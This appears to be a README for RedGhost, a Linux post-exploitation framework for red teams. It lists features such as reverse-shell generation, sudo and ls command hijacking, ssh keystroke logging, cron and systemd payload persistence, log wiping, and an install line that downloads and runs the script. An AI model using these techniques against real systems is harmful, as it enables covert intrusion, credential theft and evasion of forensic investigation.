RedGhost: Linux post-exploitation framework

RedGhost

Linux post-exploitation framework designed to assist red teams in persistence, reconnaissance, privilege escalation and leaving no trace.

• Payloads

Function to generate various encoded reverse shells in netcat, bash, python, php, ruby, perl

• SudoInject

Function to inject sudo command with wrapper function to run a reverse root shell every time “sudo” is run for privilege escalation

• lsInject

Function to inject the “ls” command with a wrapper function to run payload every time “ls” is run for persistence

• SSHKeyInject

Function to log keystrokes of a ssh process using strace

• Crontab

Function to create a cron job that downloads a payload from a remote server and runs payload every minute for persistence

• SysTimer

Function to create systemd timer that downloads and executes payload every 30 seconds for persistence.

• GetRoot

Function to try various methods to escalate privileges

• Clearlogs

Function to clear logs and make an investigation with forensics difficult

• MassInfoGrab

Function to grab mass reconnaissance/information on a system

• CheckVM

Function to check if the system is a virtual machine

• MemoryExec

Function to execute remote bash script in memory

• BanIp

Function to BanIp using iptables

Install

Requirement

apt-get install dialog gcc iptables strace

Download

wget https://raw.githubusercontent.com/d4rk007/RedGhost/master/redghost.sh; chmod +x redghost.sh; ./redghost.sh

Source: https://github.com/d4rk007/